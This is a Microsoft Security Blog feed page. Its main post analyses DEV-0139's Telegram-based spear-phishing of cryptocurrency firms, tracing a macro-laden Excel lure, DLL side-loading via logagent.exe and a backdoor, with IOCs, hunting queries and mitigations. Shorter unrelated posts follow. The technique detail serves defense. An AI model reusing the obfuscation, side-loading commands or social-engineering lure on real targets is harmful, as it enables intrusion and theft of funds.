DEV-0139 launches targeted attacks against the cryptocurrency industry

December 6th, 2022 No comments

Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.

We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.

After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:

  1. A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
  2. The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
  3. The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
  4. The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
Figure 1. Overview of the attack

Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.

In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.

As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Initial compromise

To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.

Figure 2. Legitimate profiles of cryptocurrency exchange employees (left) and fake profiles created by the threat actor (right)

It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.

After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.

Weaponized Excel file analysis

The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:

File name OKX Binance & Huobi VIP fee comparision.xls
CompObjUserTypeLen 31
CompObjUserType Microsoft Excel 2003 Worksheet
ModifyDate 2022:10:14 02:34:33
TitleOfParts Comparison_Oct 2022
SharedDoc No
Author Wolf
CodePage Windows Latin 1 (Western European)
AppVersion 16
LinksUpToDate No
ScaleCrop No
LastModifiedBy Wolf
HeadingPairs Worksheets, 1
FileType XLS
FileTypeExtension xls
HyperlinksChanged No
Security None
CreateDate 2022:10:14 02:34:31
Software Microsoft Excel
MIMEType application/
graphical user interface, application, Excel
Figure 3. The information in the malicious Excel file

The macro is obfuscated and abuses UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is IFUZYDTTOP, and the macro retrieves the information with the following code IFUZYDTTOP.MgQnQVGb.Caption where MgQnQVGb is the name of the label in the UserForm and .caption allows to retrieve the information stored into the UserForm.

The table below shows the data retrieved from the UserForm:

Obfuscated data Original data
IFUZYDTTOP.nPuyGkKr.Caption & IFUZYDTTOP.jpqKCxUd.Caption MSXML2.DOMDocument
IFUZYDTTOP.QevjtDZF.Caption b64
IFUZYDTTOP.MgQnQVGb.Caption bin.base64
IFUZYDTTOP.iuiITrLG.Caption Base64 encoded Second Worksheet
IFUZYDTTOP.hMcZvwhq.Caption C:\ProgramData\Microsoft Media
IFUZYDTTOP.PwXgwErw.Caption & IFUZYDTTOP.ePGMifdW.Caption Excel.Application

The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.

Figure 4. The deobfuscated code to load the extracted worksheet in invisible mode.

Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.

Extracted worksheet

The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:

File Name VSDB688.tmp
CompObjUserType Microsoft Excel 2003 Worksheet
ModifyDate 2022:08:29 08:07:24
TitleOfParts Sheet1
SharedDoc No
CodePage Windows Latin 1 (Western European)
AppVersion 16
LinksUpToDate No
ScaleCrop No
CompObjUserTypeLen 31
HeadingPairs Worksheets, 1
FileType XLS
FileTypeExtension xls
HyperlinksChanged No
Security None
CreateDate 2006:09:16 00:00:00
Software Microsoft Excel
MIMEType application/
graphical user interface, application
Figure 5. The second file is completely empty but contains the same UserForm abuse technique as the first stage.

The table below shows the deobfuscated data retrieved from the UserForm:

Obfuscated data Original data
GGPJPPVOJB.BkxQNjsP.Caption b64
GGPJPPVOJB.slgGbwvS.Caption bin.base64
GGPJPPVOJB.kiTajKHg.Caption C:\ProgramData\SoftwareCache\
GGPJPPVOJB.fXSPzIWf.Caption logagent.exe
GGPJPPVOJB.JzrHMGPQ.Caption wsock32.dll
GGPJPPVOJB.pKLagNSW.Caption 56762eb9-411c-4842-9530-9922c46ba2da
GGPJPPVOJB.grzjNBbk.Caption /shadow
GGPJPPVOJB.aJmXcCtW.Caption & GGPJPPVOJB.zpxMSdzi.Caption MSXML2.ServerXMLHTTP.6.0

The macro retrieves some parameters from the UserForm then downloads a PNG file from hxxps:// The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.

Figure 6. Deobfuscated code that shows the download of the file Background.png

The PNG is then split into three parts and written in three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.

Figure 7. The three files are written into C:\\ProgramData\SoftwareCache\ and run using the CreateProcess API

Loader analysis

Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.


Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.

The file contains the following metadata, but it is not signed:

Description Value
language English-US
code-page Unicode UTF-16 little endian
CompanyName Microsoft Corporation
FileDescription Windows Media Player Logagent
FileVersion 12.0.19041.746
InternalName logagent.exe
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename logagent.exe
ProductName Microsoft® Windows® Operating System
ProductVersion 12.0.19041.746

The logagent.exe imports function from the wsock32.dll which is abused by the threat actor to load malicious code into the targeted system. To trigger and run the malicious wsock32.dll, logagent.exe is run with the following arguments previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are then retrieved by wsock32.dll. The GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename for the malicious wsock32.dll to load and /shadow is used as an XOR key to decrypt it. Both parameters are needed for the malware to function, potentially hindering isolated analysis.

graphical user interface, text, application, email
Figure 8. Command line execution from the running process logagent.exe


The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.

It is possible to notice that the DLL is forwarding the call to the legitimate functions by looking at the import address table:

Figure 9. Import Address Table from wsock32.dll
Figure 10. Retrieving data with PeStudio revealed the original file name for the malicious wsock32.dll.

When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.

Figure 11. Verification of the presence of the file 56762eb9-411c-4842-9530-9922c46ba2da for decryption

The malicious wsock32.dll loads and decodes the final implant into the memory with the GUID name which is used to remote access the infected machine.

SHA256 2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17db8ea3fb
Imphash 52ff8adb6e941e2ce41fd038063c5e0e
Rich PE Hash ff102ff1ac1c891d1f5be7294035d19e
Filetype PE32+ DLL
Compile Timestamp 2022-08-29 06:33:10 UTC

Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.

Related attack

We identified another file using a similar mechanism as logagent.exe and delivering the same payload. The loader is packaged as an MSI package and as posed an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called tplink.exe to sideload the malicious DLL called DUser.dll and uses  DLL proxying as well.

creation datetime 11/12/2009 11:47
author 168 Trading
title Installation Database
page count 200
word count 2
keywords Installer, MSI, Database
last saved 11/12/2009 11:47
revision number {30CD8B94-5D3C-4B55-A5A3-3FC9C7CCE6D5}
last printed 11/12/2009 11:47
application name Advanced Installer 14.5.2 build 83143
subject CryptoDashboardV2
template x64;1033
code page Latin I
comments This installer database contains the logic and data required to install CryptoDashboardV2.
Figure 12. Installation details of the MSI file

Once the package is installed, it runs and side-loads the DLL using the following command: C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe” 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, where it noticeably uses a different GUID.

Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:

SHA256 90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e281c6b33
Imphash 52ff8adb6e941e2ce41fd038063c5e0e
Rich PE Hash ff102ff1ac1c891d1f5be7294035d19e
Filetype Win32 DLL
Compile Timestamp 2022-06-20 07:47:07 UTC

Once the DLL is running, it loads and decodes the implant in the memory and starts beaconing the same domain. In that case, the implant is using the GUID name 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key /sven.

Implant analysis

The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:

SHA256 ea31e626368b923419e8966747ca33473e583376095c48e815916ff90382dda5
Imphash 96321fa09a450119a8f0418ec86c3e08
Rich PE Hash 8c4fb0cb671dbf8d859b875244c4730c
Filetype Win32 DLL
Compile Timestamp 2022-06-20 00:51:33 UTC

First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.

Figure 13. Details about the connection to the C2.
graphical user interface, text, application, chat or text message
Figure 14. The sample is connecting back to the domain name strainservice[.]com.


It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account has been set up quickly for a one shot, indicating that it was created for only one target.

We identified one domain used as C2 server, strainservice[.]com and connected back to the two implants. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had port 80, 443, and 2083. The implants were communicated on port 443.

Defending against targeted attacks

In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new, but manage hundreds of millions of dollars, raising interest by threat actors.   

In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified was luring a fake crypto dashboard application.

The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:

  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
  • Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
  • Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
  • Turn on attack surface reduction rules to prevent common attack techniques observed in this threat:
    • Block Office applications from creating executable content
    • Block Office communication application from creating child processes
    • Block Win32 API calls from Office macros
  • Ensure that Microsoft Defender Antivirus is up to date and that real-time behavior monitoring is enabled.

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

  • TrojanDownloader:O97M/Wolfic.A
  • TrojanDownloader:O97M/Wolfic.B
  • TrojanDownloader:O97M/Wolfic.C
  • TrojanDownloader:Win32/Wolfic.D
  • TrojanDownloader:Win32/Wolfic.E
  • Behavior:Win32/WolficDownloader.A
  • Behavior:Win32/WolficDownloader.B

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

  • An executable loaded an unexpected dll
  • DLL search order hijack
  • ‘Wolfic’ malware was prevented

Advanced hunting queries

The following hunting queries locate relevant activity.

Query that looks for Office apps that create a file within one of the known bad directories:

| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook" "powerpnt")
| where ActionType == "FileCreated"
| where parse_path( FolderPath ).DirectoryPath has_any(
    @"C:\ProgramData\Microsoft Media",
| project Timestamp, DeviceName, FolderPath, InitiatingProcessFileName, SHA256, InitiatingProcessAccountName, InitiatingProcessAccountDomain

Query that looks for Office apps that create a file within an uncommon directory (less that five occurrences), makes a set of each machine this is seen on, and each user that has executed it to help look for how many users/hosts are compromised:

| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5

Query that summarizes child process of Office apps, looking for less than five occurrences:

| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5

Query that lists of all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths, with less than five occurrences:

| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5

Query that searches for connections to malicious domains and IP addresses:

| where (RemoteUrl has_any ("")) 
     or (RemoteIP has_any (""))

Query that searches for files downloaded from malicious domains and IP addresses.

| where (FileOriginUrl  has_any ("")) 
     or (FileOriginIP  has_any (""))

Query that searchers for Office apps downloading files from uncommon domains, groups users, filenames, and devices together:

| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName),
    FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName

Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:

| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend  Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
    UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName

Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:

| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex 
    @"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]$"

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:

To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:

Indicators of compromise

IOC Filename/Type  Description
abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0 OKX Binance & Huobi VIP fee comparision.xls Weaponized Excel file
17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b OKX Binance & Huobi VIP fee comparision.xls Weaponized Excel file
a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9 VSDB688.tmp Second worksheet dropped
2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17db8ea3fb wsock32.dll / HijackingLib.dll Malicious dropper that acts as a DLL proxy to legit wsock32.dll
82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629 Duser.dll  
90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e281c6b33 Duser.dll / HijackingLib.dll Malicious dropped that acts as a DLL proxy to the legit Duser.dll
e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487 4acbe3.msi Fake CryptoDashboard application MSI package  delivering Duser.dll
82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629 43d972.msi Second fake application BloxHolder delviering Duser.dll
ea31e626368b923419e8966747ca33473e583376095c48e815916ff90382dda5 DLL Implant loaded by Duser.dll
C:\ProgramData\SoftwareCache\wsock32.dll Path Path of wsock32.dll
C:\Users\user\AppData\Roaming\Dashboard_v2\DUser.dll Path Path of Duser.Dll
C:\Program Files\CryptoDashboardV2\ Path Path of the fake app
C:\ProgramData\Microsoft Media\VSDB688.tmp Path Path of the second worksheet
hxxps:// Background.png downloaded from OpenDrive Png file downloaded on the victim machines Domain/C2 Command and control server IP/C2 IP of the C2
56762eb9-411c-4842-9530-9922c46ba2da  GUID GUID used 
27E57D84-4310-4825-AB22-743C78B8F3AA GUID GUID used 
TPLink.exe” 27E57D84-4310-4825-AB22-743C78B8F3AA /sven Command line Command line runs by the legit exe
logagent.exe 56762eb9-411c-4842-9530-9922c46ba2da /shadow Command line Command line runs by the legit file

MITRE ATT&CK techniques

Tactics Technique ID Name Description
Reconnaissance T1591 Gather Victim Org Information The attackers gathered information about the targets reaching them on Telegram with a clear understanding of their challenges.
T1593.001 Social Media Attackers identified the targets on specific crypto currencies group on Telegram.
Resource Development T1583.001 Acquire Infrastructure: Domains Attackers registered the domain “” on June 18
Initial Access T1566.001 Spearphishing Attachment Attackers sent a weaponized Excel document.
Execution T1204.002 User Execution: Malicious File The targeted user must open the weaponized Excel document and enable macros.
T1059.005 Command and Scripting Interpreter: Visual Basic Attackers used VBA in the malicious excel document “OKX Binance & Huobi VIP fee comparision.xls” to deliver the implant.
T1106 Native API Usage of CreateProcess API in the excel document to run the executable.
Persistence, Privilege Escalation, Defense Evasion T1574.002 DLL side-Loading The attackers abused the legitimate Logagent.exe to side-load the malicious wsock32.dll and the legitimate TPLink.Exe to side load Duser.dll
Defense Evasion T1027 Obfuscated file or information The malicious VBA is obfuscated using UserForm to hide variable and data.
T1036.005 Masquerading: Match Legitimate Name or Location The attackers are using legitimate DLL name that acts as DLL Proxy to the original one (wsock32.dll and Duser.dll).
T1027.009 Obfuscated Files or Information: Embedded Payloads The malicious DLL are dropping the implant into the machine.
Command & Control T1071.001 Application Layer Protocol: Web Protocols The implant is communicating to the remote domain through port 80 or 443.
T1132 Data Encoding The implant is encoding the data exchanged with the C2.
Exfiltration T1041 Exfiltration over C2 channel The implant has the ability to exfiltrate information.

The post DEV-0139 launches targeted attacks against the cryptocurrency industry appeared first on Microsoft Security Blog.

BlueHat 2023: Applications to Attend NOW OPEN!

December 2nd, 2022 No comments

We are excited to announce that applications to attend BlueHat 2023 are now open!   BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023.   Hosted by the Microsoft Security Response Center (MSRC), BlueHat is where …

BlueHat 2023: Applications to Attend NOW OPEN! Read More »

Categories: BlueHat Tags:

BlueHat 2023: Applications to Attend NOW OPEN!

December 2nd, 2022 No comments

We are excited to announce that applications to attend BlueHat 2023 are now open!   BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023.   Hosted by the Microsoft Security Response Center (MSRC), BlueHat is where …

BlueHat 2023: Applications to Attend NOW OPEN! Read More »

Categories: BlueHat Tags:

Implementing Zero Trust access to business data on BYOD with Trustd MTD and Microsoft Entra

November 30th, 2022 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog seriesLearn more about MISA. 

As more employees work remotely on a variety of devices and networks, businesses need a security model that supports this new operational efficiency. An expanding perimeter poses challenges for organizational security, exposing your company to risks from malware and data breaches from IT devices that are unknown and unsafe.

To adapt to the realities of modern work, the principles of Zero Trust have been rapidly adopted as a security best practice by businesses and security professionals alike.

A pillar of the Zero Trust framework is based on assuming devices are breached until they are explicitly verified as trusted.

This applies particularly to mobile devices, as employee-held smartphones are increasingly infected with malware, targeted by phishing attacks, or exploited due to vulnerable software and configuration. These threats on untrusted devices that access company data result in businesses suffering from cyberattacks and data breaches. By embracing the principles of Zero Trust, businesses can better manage these risks and secure themselves against mobile-borne threats by ensuring that only trusted devices have access to company data.

How Microsoft and Traced work together to ensure endpoint protection based on Zero Trust principles

United Kingdom-based cybersecurity vendor Traced Mobile Security joined the Microsoft Intelligence Security Association (MISA) with the goal of transforming Zero Trust access to business data on mobile devices.

At Traced, our vision is to live in a world where anyone can comfortably, easily, and securely use the same mobile device for work and play. MISA has helped us to do with their valuable advice, access to technical experts, and sharing our vision for safer devices.

Benedict Jones, Co-Founder, Traced

Trust nothing, verify everything.

With ever-more mobile devices accessing company networks, information, and cloud apps, customers need to be able to automatically control access to cloud apps based on the security status of a smartphone or tablet—whether it’s personal- or corporate-owned.

So Traced developed Trustd MTD to provide simple, fast, and robust Zero Trust access to those Cloud Apps for Microsoft customers. Trustd’s integration with Microsoft Azure Active Directory (Azure AD), part of the Microsoft Entra product family, helps customers achieve compliance and mitigate the growing business risks of cyberattacks and data breaches originating from company and personal mobile devices.

This means that customers can:

  • Reduce the risk of data breaches, fines, and damages from cyberthreats such as Man-in-the-Middle attacks, malware, and phishing.
  • Enable secure remote working without compromising efficiency.
  • Automatically allow access to company data when a user’s device is validated as trusted and restrict access if it becomes untrusted.
  • Protect their private data on mobile devices across most locations and networks.

“As mobile threats abound in greater numbers, we’re seeing many businesses struggling to protect themselves. We’re using Trustd MTD to enforce the principles of Zero Trust for our customers and ensure that untrusted and compromised mobile devices cannot access company data.”

Fayyaz Shah, Chief Operating Officer, METCLOUD

Through Trustd MTD’s integration with Azure AD conditional access policies, customers can automatically restrict access to thousands of Azure AD Gallery apps from users with compromised or untrusted mobile devices.

Architectural diagram describing Trustd MTD’s integration with Microsoft Azure Active Directory.

With Azure AD Single Sign-on (SSO) being seamlessly supported across such a broad range of apps, Trustd MTD’s integration with Azure AD for conditional access to company resources means that we can together ensure that company data is inaccessible to compromised users for your business’ key and sensitive apps.

Benedict Jones, Co-Founder, Traced

Free Zero Trust white paper

To learn more about Zero Trust and how Azure AD integrates with Traced’s MTD solution, download the free Trustd whitepaper “Zero Trust mobile security in a perimeter-less world.”

Snippet of Zero Trust white paper.

About Traced

Traced’s vision is to make the invisible visible.

It’s about making software that shines a light on threats that are invisible to traditional forms of detection. It’s about making sure their software protects people by being easy to understand, effective, and affordable. And it’s about respecting users’ and employees’ privacy by being transparent about what you’re doing and why.

And it’s about making a different kind of security company. A company that understands and talks about the threats that businesses really face every day, rather than the ones that get the best headlines or induce the greatest fear. For more information, visit the Traced website.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit the website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.  

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Implementing Zero Trust access to business data on BYOD with Trustd MTD and Microsoft Entra appeared first on Microsoft Security Blog.

A Ride on the Wild Side with Hacking Heavyweight Sick Codes

November 29th, 2022 No comments

Beverage of Choice: Krating Daeng (Thai Red Bull) Industry Influencer he Admires: Casey John Ellis What did you want to be when you grew up? A physician and nearly did Hobbies (Present & Past): Motorcycling & Australian Football Bucket List: Continuing to discover new software Fun Fact: He currently has 2,000 tabs open “People keep …

A Ride on the Wild Side with Hacking Heavyweight Sick Codes Read More »

Categories: BlueHat Tags:

Microsoft supports the DoD’s Zero Trust strategy

November 22nd, 2022 No comments

The Department of Defense (DoD) released its formal Zero Trust strategy today, marking a major milestone in its goal of achieving enterprise-wide implementation by 2027. The strategy comes at a critical time as United States government networks continue to face nearly half the global nation-state attacks that occur, according to the Microsoft Digital Defense Report 2022.1

Microsoft applauds the DoD’s ongoing efforts to modernize and innovate its approach to cybersecurity. The DoD released its initial Zero Trust reference architecture shortly before last year’s White House executive order on cybersecurity2 and quickly followed with Version 2.0 in July 2022.3 The latest update provides crucial details for implementing the Zero Trust strategy, including clear guidance for the DoD and its vendors regarding 45 separate capabilities and 152 total activities. 

While Zero Trust initiatives have been underway for years across various departments, this updated strategy seeks to unify efforts to achieve a strong, proven defensive posture against adversary tactics. Collaborating on Zero Trust has been a challenge across the industry as it can be difficult to compare Zero Trust implementations across organizations and technology stacks. However, the level of detail found in the DoD’s strategy provides a vendor-agnostic, common lens to evaluate the maturity of a variety of existing and planned implementations that were derived from the DoD’s unique insights into cyberspace operations.

Furthermore, the DoD’s shift from a compliance and controls-based approach to an outcomes-focused methodology—meaning the job is done when the adversary stops, not just when the controls are in place—stands out as a best practice not seen elsewhere to this extent.

Building a secure foundation for Zero Trust together

Strong industry and public sector partnerships are at the heart of our approach, which is why Microsoft was invited by the DoD to discuss how its Zero Trust definitions would map to new and existing computing environments.

Microsoft is uniquely suited to support the DoD in its Zero Trust mission as both a leading cloud service provider to the government and a security company. Microsoft is recognized as a Leader in five Gartner® Magic Quadrant™ reports4,5,6,7,8,9 and seven Forrester Wave™ categories,10,11,12,13,14,15,16 representing a full array of fit-for-purpose security tools to achieve Zero Trust outcomes. These components are pre-integrated to provide a strong baseline and a fast path to comprehensive coverage across the DoD’s seven pillars and 45 capabilities of Zero Trust to achieve both target and advanced activities.

Beyond comprehensive coverage of the DoD’s latest capabilities requirements, our strong baseline is further enhanced by an open ecosystem of more than 90 partner Zero Trust solutions from leading security companies that integrate directly with our platform. To name a few:

  • Tenable and Microsoft are working together to integrate with Microsoft Defender for Cloud and Microsoft Sentinel solutions to support vulnerability assessments for hybrid cloud workloads.
  • Yubico and Microsoft recently announced the release of certificate-based authentication (CBA) for Microsoft Azure Active Directory on Windows, iOS, and Android devices through a hardware security key known as YubiKey to fight against phishing attacks.
